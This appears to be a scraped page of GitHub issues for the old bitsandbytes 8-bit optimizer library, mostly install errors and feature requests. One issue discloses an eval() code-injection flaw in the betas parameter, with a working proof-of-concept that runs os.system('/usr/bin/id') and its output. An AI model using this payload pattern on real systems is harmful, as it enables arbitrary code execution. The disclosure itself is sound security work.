This repository is no longer supported. Please use the new bitsandbytes here: https://github.com/TimDettmers/bitsandbytes.
You can install the new bitsandbytes version via:
pip install bitsandbytes
Library for 8-bit optimizers and quantization routines.
License: MIT License
This repository is no longer supported. Please use the new bitsandbytes here: https://github.com/TimDettmers/bitsandbytes.
You can install the new bitsandbytes version via:
pip install bitsandbytes
import bitsandbytes as bnb
出现如下
OSError: /home/anaconda3/envs/ner/lib/python3.6/site-packages/bitsandbytes/libbitsandbytes.so: undefined symbol: __fatbinwrap_38_cuda_device_runtime_compute_75_cpp1_ii_8b1a5d37
您好,请问这该怎么解决啊
Hey @TimDettmers,
Awesome library! bnb.optim.Adam
saved me from having to use model parallelism 😍
Do you think it would be easy to also add a bnb.optim.AdamW
version for https://pytorch.org/docs/stable/generated/torch.optim.AdamW.html#torch.optim.AdamW
?
Happy to give it a try if you think it's easily feasible :-)
Optimizer2State
class accepts strings in the optional betas
parameter during initialization. The string value is passed to eval()
without prior validation, potentially leading to execution of arbitrary code.
bitsandbytes/bitsandbytes/optim/optimizer.py
Lines 235 to 246 in 22b2877
bnb.optim.Adam
, bnb.optim.Adam8bit
and bnb.optim.Adam32bit
exhibit the same behaviour.
#!/usr/bin/env python3
hello = "exec(\"import os;os.system('/usr/bin/id');\")"
try:
from bitsandbytes.optim.optimizer import Optimizer2State
Optimizer2State('test', 'test', betas=hello)
except:
pass
try:
import bitsandbytes as bnb
bnb.optim.Adam('test', betas=hello)
except:
pass
try:
import bitsandbytes as bnb
bnb.optim.Adam8bit('test', betas=hello)
except:
pass
try:
import bitsandbytes as bnb
bnb.optim.Adam32bit('test', betas=hello)
except:
pass
$ id
uid=1000(asdf) gid=1000(asdf) groups=1000(asdf)
$ ./test.py
uid=1000(asdf) gid=1000(asdf) groups=1000(asdf)
None parsed
uid=1000(asdf) gid=1000(asdf) groups=1000(asdf)
None parsed
uid=1000(asdf) gid=1000(asdf) groups=1000(asdf)
None parsed
uid=1000(asdf) gid=1000(asdf) groups=1000(asdf)
None parsed
The following tests fail on Pascal:
tests/test_functional.py::test_estimate_quantiles[float] FAILED
tests/test_functional.py::test_estimate_quantiles[half] FAILED
tests/test_functional.py::test_quantile_quantization FAILED
My guess is this is probably due to atomicAdd
for floats working differently.
There's some quantization example here
It showed that there is bnb.functional.quantize_fp4(x)
But I didn't find it in documentations.
In this line instead of passing the sparse
parameter, False
is passed. Is this intended? It's a little confusing since the default for sparse
is True
here but False
in torch.nn.Embedding
Replace embedding layer if necessary:
torch.nn.Embedding(..)
->bnb.nn.Embedding(..)
Does it suppose user creation of custom classes to replace (for example) huggingface transformers' GPT2DoubleHeadsModel?
Or there is something like bnb.optim.GlobalOptimManager
which change provided model instance to use bitsandbytes embeddings instead of torch ones?
Thank you for the nice project.
When I use AdamW8bit optimizer, i could save the GPU memory.
However, when i combined the optimizer with OSS in fairscale,
the GPU memory is not reduced.
Is not this library compatible with OSS in fairscale. or another issue?
Great work!
Can you, please, add implementation for Novograd algorithm?
Support info:
paper: https://arxiv.org/abs/1905.11286
Novograd implementations:
https://github.com/NVIDIA/apex/blob/master/apex/optimizers/fused_novograd.py
https://github.com/jettify/pytorch-optimizer/blob/master/torch_optimizer/novograd.py
https://github.com/convergence-lab/novograd
https://github.com/lonePatient/NovoGrad-pytorch
https://github.com/titu1994/keras_novograd
Using the bnb.optim.Adam8bit optimizer in place of torch.optim.Adam causes a crash after a handful of batches:
12it [00:22, 1.82s/it]Error an illegal memory access was encountered at line 198 in file /home/alyssa/gpt_math/bitsandbytes/csrc/ops.cu
I am fine-tuning Huggingface's version of the gpt2-large model on an Ampere 3090 GPU with CUDA version 11.6 and nVidia driver version 510.73.05. I have tried compiling bitsandbytes on my machine from source, and the set_optim_to_run_embedding_in_fp32
trick from huggingface/transformers#14819; neither of them affected the behavior. Running with the standard pytorch Adam optimizer works fine. nvidia-smi
shows 16 GB of memory used on a GPU with 24 GB, so it shouldn't be running out of RAM or anywhere close to that.
I am trying to train GPT-J with 8bit weights. It's working well on GPU. But When I try to use it on CPU, it gives this error
'NoneType' object has no attribute 'cdequantize_blockwise_cpu_fp32'
I have used dequantize_blockwise
from bitsandbytes.functional
. Following is the class in which its used:
class DequantizeAndLinear(torch.autograd.Function):
def forward(ctx, input: torch.Tensor, weights_quantized: torch.ByteTensor,
absmax: torch.FloatTensor, code: torch.FloatTensor, bias: torch.FloatTensor):
weights_deq = dequantize_blockwise(weights_quantized, absmax=absmax, code=code)
ctx.save_for_backward(input, weights_quantized, absmax, code)
ctx._has_bias = bias is not None
return F.linear(input, weights_deq, bias)
def backward(ctx, grad_output: torch.Tensor):
assert not ctx.needs_input_grad[1] and not ctx.needs_input_grad[2] and not ctx.needs_input_grad[3]
input, weights_quantized, absmax, code = ctx.saved_tensors
# grad_output: [*batch, out_features]
weights_deq = dequantize_blockwise(weights_quantized, absmax=absmax, code=code)
grad_input = grad_output @ weights_deq
grad_bias = grad_output.flatten(0, -2).sum(dim=0) if ctx._has_bias else None
return grad_input, None, None, None, grad_bias
Is it possible to run it on CPUor should I have to run it only GPU ?
I am have OSError: [WinError 193] %1 is not a valid Win32 application in lib = ct.cdll.LoadLibrary(os.path.dirname(file) + '/libbitsandbytes.so') in functional.py. WAIDW?
First of all, great work!
Secondly, I can see that you specify that Maxwell Architecture is necessary, and I am wondering if
I ask because Kaggle and Colab notebooks use Tesla Architectures (P100, K80), and I'm sure those communities, myself included, would be interested in using bitsandbytes
Hi,
Thanks for the great work! I'm currently trying to apply your code to vision transformers, specifically, on this code base:
https://github.com/facebookresearch/SlowFast/tree/main/projects/mvit
When using torch.optim.SGD(momentum=0.9), the code consumes 9221MiB GPU memory during training. After changing it to use bnb.optim.SGD8bit() with the same arguments, it consumes even a bit more GPU memory of 9235MiB. Do you have any idea why this would happen? Thank you! My CUDA version is 10.2 and torch version is 1.9.1.
Best,
Junwei
(torch1.8-py3.8) jiaofangkai@dell-PowerEdge-T640:/home/share/jiaofangkai$ python check_bnb_install.py
Traceback (most recent call last):
File "check_bnb_install.py", line 1, in <module>
import bitsandbytes as bnb
File "/home/share/jiaofangkai/anaconda3/envs/torch1.8-py3.8/lib/python3.8/site-packages/bitsandbytes/__init__.py", line 5, in <module>
from .optim import adam
File "/home/share/jiaofangkai/anaconda3/envs/torch1.8-py3.8/lib/python3.8/site-packages/bitsandbytes/optim/__init__.py", line 5, in <module>
from .adam import Adam, Adam8bit, Adam32bit
File "/home/share/jiaofangkai/anaconda3/envs/torch1.8-py3.8/lib/python3.8/site-packages/bitsandbytes/optim/adam.py", line 6, in <module>
from bitsandbytes.optim.optimizer import Optimizer2State
File "/home/share/jiaofangkai/anaconda3/envs/torch1.8-py3.8/lib/python3.8/site-packages/bitsandbytes/optim/optimizer.py", line 6, in <module>
import bitsandbytes.functional as F
File "/home/share/jiaofangkai/anaconda3/envs/torch1.8-py3.8/lib/python3.8/site-packages/bitsandbytes/functional.py", line 13, in <module>
lib = ct.cdll.LoadLibrary(os.path.dirname(__file__) + '/libbitsandbytes.so')
File "/home/share/jiaofangkai/anaconda3/envs/torch1.8-py3.8/lib/python3.8/ctypes/__init__.py", line 459, in LoadLibrary
return self._dlltype(name)
File "/home/share/jiaofangkai/anaconda3/envs/torch1.8-py3.8/lib/python3.8/ctypes/__init__.py", line 381, in __init__
self._handle = _dlopen(self._name, mode)
OSError: /home/share/jiaofangkai/anaconda3/envs/torch1.8-py3.8/lib/python3.8/site-packages/bitsandbytes/libbitsandbytes.so: undefined symbol: __fatbinwrap_38_cuda_device_runtime_compute_75_cpp1_ii_8b1a5d37
Hi, I have encountered similar questions to #5 . I have tested with TeslaT4 and RTX 2080Ti but both failed.
The environment are as follows:
# TeslaT4
Ubuntu 18.04.6, Tesla T4, cuda-10.1, driver vesion: 418.197.02, python=3.8, torch=1.8.1+cu101
# RTX 2080Ti
Ubuntu 20.04.3, RTX 2080Ti, cuda-10.1, driver version: 435.21, python=3.8, torch=1.8.1+cu101
(bitsandbytes) chenxin@chenxin-Nitro-AN515-52:/disk1/github/bitsandbytes$ python setup.py install/disk1/github/bitsandbytes$ conda list | grep cudatoolkit
Traceback (most recent call last):
File "setup.py", line 15, in
name = f"bitsandbytes-cuda{os.environ['CUDA_VERSION']}",
File "/home/chenxin/disk1/anaconda3/envs/bitsandbytes/lib/python3.8/os.py", line 675, in getitem
raise KeyError(key) from None
KeyError: 'CUDA_VERSION'
(bitsandbytes) chenxin@chenxin-Nitro-AN515-52:
cudatoolkit 11.1.1 h6406543_8 conda-forge
THCudaCheck FAIL file=/pytorch/aten/src/THC/generic/THCTensorMath.cu line=29 error=1 : invalid argument
Traceback (most recent call last):
File "train_pointunet.py", line 211, in <module>
loss_seg = lossfunc_seg(outputs_seg, labels)+lossfunc_dice(outputs_seg,labels)
File "/home/why/miniconda3/envs/3.6.8/lib/python3.6/site-packages/torch/tensor.py", line 245, in backward
torch.autograd.backward(self, gradient, retain_graph, create_graph, inputs=inputs)
File "/home/why/miniconda3/envs/3.6.8/lib/python3.6/site-packages/torch/autograd/__init__.py", line 147, in backward
allow_unreachable=True, accumulate_grad=True) # allow_unreachable flag
RuntimeError: cuda runtime error (1) : invalid argument at /pytorch/aten/src/THC/generic/THCTensorMath.cu:29
im very confused because in the first several epoches it works fine.
With some CUDA versions and on some architectures this error occurs:
Traceback (most recent call last):
File "check_bnb_install.py", line 1, in <module>
import bitsandbytes as bnb
File "/miniconda/envs/pytorch_env/lib/python3.7/site-packages/bitsandbytes/__init__.py", line 5, in <module>
from .optim import adam
File "/miniconda/envs/pytorch_env/lib/python3.7/site-packages/bitsandbytes/optim/__init__.py", line 5, in <module>
from .adam import Adam, Adam8bit, Adam32bit
File "/miniconda/envs/pytorch_env/lib/python3.7/site-packages/bitsandbytes/optim/adam.py", line 5, in <module>
from bitsandbytes.optim.optimizer import Optimizer2State
File "/miniconda/envs/pytorch_env/lib/python3.7/site-packages/bitsandbytes/optim/optimizer.py", line 6, in <module>
import bitsandbytes.functional as F
File "/miniconda/envs/pytorch_env/lib/python3.7/site-packages/bitsandbytes/functional.py", line 13, in <module>
lib = ct.cdll.LoadLibrary(os.path.dirname(__file__) + '/libbitsandbytes.so')
File "/miniconda/envs/pytorch_env/lib/python3.7/ctypes/__init__.py", line 442, in LoadLibrary
return self._dlltype(name)
File "/miniconda/envs/pytorch_env/lib/python3.7/ctypes/__init__.py", line 364, in __init__
self._handle = _dlopen(self._name, mode)
OSError: /miniconda/envs/pytorch_env/lib/python3.7/site-packages/bitsandbytes/libbitsandbytes.so: undefined symbol: __fatbinwrap_38_cuda_device_runtime_compute_75_cpp1_ii_8b1a5d37
Confirmed for CUDA 10.1 for compute capability 7.5 (V100).
New Model out. Any chance it'll be supported by you guys?
OSError: We couldn't connect to 'https://huggingface.co' to load this file, couldn't find it in the cached files and it looks like decapoda-research/llama-7b-hf is not the path to a directory containing a file named config.json.
Checkout your internet connection or see how to run the library in offline mode at 'https://huggingface.co/docs/transformers/installation#offline-mode'.
Is there any plans to support models/grads with bfloat16 type? Bfloat gained quite the popularity lately as every ampere GPU supports the type, and eliminates the need for loss scaling compared to float16.
This is what I get when I try to initialize bnb.AdamW with a bfloat16 casted model:
ValueError: Gradient+optimizer bit data type combination not supported: grad torch.bfloat16, optimizer torch.uint8
As reported in the paper, for training a bi-directional transformer model on WMT14 or WMT16 the performance of 8-bit Adam stays relatively consistent with the 32-bit counterparts. I was also able to verify this on other data sources for training bi-directional models with my own setup.
However, I've also tried multiple variations of 8-bit optimizers on multilingual neural machine translation (MNMT) models in fairseq and there it seems that even with --no-scale-embedding
as well as the StableEmbedding
the performance is roughly 3 BLEU behind the counterparts. The --no-scale-embedding
flag amounts to roughly 7 BLEU gain, while the xavier init amounts to roughly 0.4 BLEU gain. Didn't look into the effect of the layer norm of the stable embeddings yet.
Did you do any testing on that and have practical tips on getting the performance up?
Hi.
I am training my network with bnb.optim.Adam8bit
vs torch.optim.Adam
but I don't see any difference in memory consumption.
Running on GTX 2080Ti (single gpu or DDP).
with cudatoolkit 11.1.74
bitsandbytes-cuda111
looking in nvidia-smi I see 9.6GB in both cases
Am I missing something here?
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.